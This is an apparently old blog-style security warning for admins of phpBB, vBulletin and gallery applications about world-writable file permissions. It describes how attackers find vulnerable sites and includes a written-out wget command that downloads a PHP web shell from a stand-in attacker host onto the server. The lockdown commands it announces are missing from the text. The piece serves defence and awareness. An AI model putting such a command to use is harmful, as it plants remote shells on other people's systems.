Want to get hacked? It’s easy, just ‘chmod 777’ everything the next time you install a bbs or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see, and exploit the unsecured areas of your system.
For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.
The neer-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.0.x.’ Upon finding a potential victom, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777” giving the hakr all the information he needs to then “wget http://myhakrhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system. Once that happens, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).
So two things I ask of you.
- Keep your online applications up-to-date – get on their mailing list to kee abreast of changes, updates and patches.
- For those of you with shell access to your system, run file permission scans such as ‘find -perm 777’ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’
For those of you whose paranoia-meter just went off scale, here is a command that for now will lock down those open areas:
For those of you with root access:
You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.